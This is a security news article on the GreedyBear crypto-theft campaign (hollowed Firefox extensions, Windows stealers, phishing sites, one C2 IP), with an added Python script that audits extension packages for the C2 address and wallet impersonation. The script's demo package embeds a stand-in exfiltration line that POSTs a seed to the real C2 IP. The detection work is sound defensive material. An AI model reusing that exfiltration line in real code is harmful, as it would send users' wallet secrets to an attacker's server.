GreedyBear Crypto Theft: How Hackers Stole Over $1M Using Malicious Extensions and Malware
Cybercriminals have raised the stakes once again. The group tracked as GreedyBear has stolen over $1 million in cryptocurrency through a single coordinated campaign that combines malicious Firefox extensions, Windows malware, and fake crypto websites, all of it pointed at the same command-and-control server.
1. Weaponized Firefox Extensions: Extension Hollowing
GreedyBear published over 150 Firefox extensions that initially did what they claimed, such as link cleaners and video tools. Once the extensions had built up an install base, the group pushed updates that rewrote them into look-alikes of trusted wallets, including MetaMask, TronLink, Exodus, and Rabby Wallet.
This method, known as extension hollowing, works because the update travels through the add-on store's normal update channel: the extension keeps its users and whatever reputation the benign version earned. The hollowed versions captured wallet credentials (seed phrases and private keys) typed into the extension's own popup UI and sent them, together with the victim's external IP address, to the group's server.
2. Malware Executables Targeting Windows
The group deployed nearly 500 malicious executables, including credential stealers such as LummaStealer, ransomware variants, and generic Trojans. These files were distributed through Russian-language piracy websites hosting cracked or repacked software, so a user who installed a "crack" installed the malware with it.
3. Phishing Pages and Fake Crypto Websites
GreedyBear also set up scam websites posing as crypto services, such as wallet tools and hardware-wallet shops. These professionally designed sites collected payment details, wallet credentials, and other sensitive data under false pretenses.
4. Single Command-and-Control Infrastructure
All three attack components traced back to one IP address: 185.208.156.66. The same server received the data exfiltrated by the hollowed extensions, served as the C2 for the malware, and hosted the phishing sites, which points to a single operator running a well-coordinated infrastructure rather than three separate campaigns. That single address is also the most useful indicator of compromise the campaign leaves behind: any extension package or network log that references it deserves immediate attention.
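The following script is an added example (not code from the original article or from the researchers who reported the campaign) showing how a practitioner would check a Firefox profile's `extensions` directory for the two indicators this campaign leaves behind: an extension package that references the C2 address 185.208.156.66, and an installed extension whose name or description impersonates one of the wallets named above. Firefox stores each installed extension as `<profile>/extensions/<addon-id>.xpi`, which is a ZIP archive with a `manifest.json` at its root. The two `.xpi` files it inspects are constructed inline in a temporary directory purely for the demonstration; the addon IDs, the `/collect` path and the JavaScript inside them are made up.

```python
"""Audit Firefox extension packages (.xpi) for GreedyBear-style indicators.

Added example: scans every .xpi in a directory for (1) the published C2 IP
and (2) wallet-brand impersonation in the manifest. Sample packages are
constructed on the fly; nothing here is real malware.
"""
import json
import os
import re
import tempfile
import zipfile

# Indicator from the public GreedyBear reporting: the single C2 address.
C2_INDICATORS = {"185.208.156.66"}

# Wallet brands the hollowed extensions impersonated.
WALLET_BRANDS = ("metamask", "tronlink", "exodus", "rabby")

# Dotted-quad literals. Deliberately loose: it will also catch 4-part version
# strings, which is acceptable for a triage tool (review ip_literals by hand).
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
TEXT_EXT = (".js", ".mjs", ".json", ".html")


def audit_xpi(path):
    """Return findings for one .xpi: manifest metadata, IOC hits, brand mimicry."""
    findings = {"path": path, "name": None, "version": None, "permissions": [],
                "ioc_hits": [], "ip_literals": [], "wallet_mimic": False}
    with zipfile.ZipFile(path) as zf:
        try:
            manifest = json.loads(zf.read("manifest.json"))
        except KeyError:          # not a WebExtension package
            manifest = {}
        findings["name"] = manifest.get("name")
        findings["version"] = manifest.get("version")
        findings["permissions"] = (list(manifest.get("permissions", []))
                                   + list(manifest.get("host_permissions", [])))
        display = f"{manifest.get('name', '')} {manifest.get('description', '')}".lower()
        findings["wallet_mimic"] = any(b in display for b in WALLET_BRANDS)
        # Walk every text member and look for IP literals, then compare to IOCs.
        for member in zf.namelist():
            if not member.lower().endswith(TEXT_EXT):
                continue
            text = zf.read(member).decode("utf-8", errors="replace")
            for ip in sorted(set(IP_RE.findall(text))):
                findings["ip_literals"].append((member, ip))
                if ip in C2_INDICATORS:
                    findings["ioc_hits"].append((member, ip))
    return findings


def is_suspicious(findings):
    """A C2 reference is conclusive; a wallet-brand name warrants a manual look."""
    return bool(findings["ioc_hits"]) or findings["wallet_mimic"]


def audit_extensions_dir(ext_dir):
    """Audit every .xpi in a Firefox profile's extensions directory."""
    return [audit_xpi(os.path.join(ext_dir, n))
            for n in sorted(os.listdir(ext_dir)) if n.endswith(".xpi")]


def _write_xpi(path, manifest, files):
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
        for name, body in files.items():
            zf.writestr(name, body)


def build_demo_profile():
    """Constructed sample: a benign extension and a hollowed copy of it."""
    d = tempfile.mkdtemp(prefix="ff-ext-")
    _write_xpi(os.path.join(d, "linkcleaner@example.xpi"),           # hypothetical ID
               {"manifest_version": 2, "name": "Link Cleaner", "version": "1.0",
                "permissions": ["activeTab"]},
               {"background.js": "browser.tabs.onUpdated.addListener(() => {});"})
    _write_xpi(os.path.join(d, "linkcleaner@example-hollowed.xpi"),  # hypothetical ID
               {"manifest_version": 2, "name": "Rabby Wallet", "version": "2.0",
                "permissions": ["storage", "<all_urls>"]},
               # Stand-in for an exfiltration call; the path is invented.
               {"background.js": 'fetch("http://185.208.156.66/collect", '
                                 '{method: "POST", body: JSON.stringify(seed)});'})
    return d


if __name__ == "__main__":
    for f in audit_extensions_dir(build_demo_profile()):
        flag = "SUSPICIOUS" if is_suspicious(f) else "ok"
        print(f"{flag:10} {f['name']!r} v{f['version']} perms={f['permissions']} "
              f"ioc={f['ioc_hits']} mimic={f['wallet_mimic']}")
```

To run it against a real profile, point `audit_extensions_dir` at the `extensions` folder shown under `about:profiles` (and remember that the hollowed package is whatever version is installed now, not the one the user originally reviewed, so the `version` field is worth comparing with what the store lists). The brand check is a heuristic: a legitimate wallet extension will also trip it, which is why the script reports rather than deletes.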
5. A Campaign of Escalation
First observed as the Foxy Wallet campaign, which used about 40 extensions, GreedyBear has since scaled to over 150 extensions plus the malware and phishing arms described above. The speed of that growth, together with signs of AI-generated code in the samples, suggests the group is industrializing crypto theft rather than hand-building each lure.
Protect Yourself: Cyber Hygiene Tips
- Review installed browser extensions regularly and remove any you do not recognize; an extension that suddenly changes its name or purpose after an update is a red flag, not a feature.
- Install wallet extensions only from the link on the wallet vendor's own site, and check that the store listing's publisher and version history match it. Avoid browser-based crypto tools unless you need them.
- Do not run cracked or repacked software from piracy sites; the "crack" is the delivery mechanism.
- Enable multi-factor authentication (MFA) on exchange and other custodial accounts.
- If you suspect a seed phrase or private key was exposed, treat the wallet as burned: move the funds to a freshly generated wallet. Unlike a password, a leaked seed phrase cannot be reset.
- Store long-term holdings offline in a cold wallet when possible.
Summary Table
Aspect | Details |
---|---|
Theft Amount | Over $1 million in cryptocurrency |
Attack Vectors | Browser extensions, malware executables, scam websites |
Tools Used | Extension Hollowing, AI malware, credential stealers |
C2 Server | 185.208.156.66 |
Initial Campaign | Foxy Wallet – now rebranded and expanded |
Conclusion
The GreedyBear campaign shows how cybercrime groups now run multi-pronged operations from shared infrastructure, reusing one server across extensions, malware, and phishing. Crypto users must treat browser extensions as software that can change under them, verify wallet tools before trusting them with keys, and keep the bulk of their holdings off any internet-connected device. As these campaigns scale, proactive defense is the best safeguard.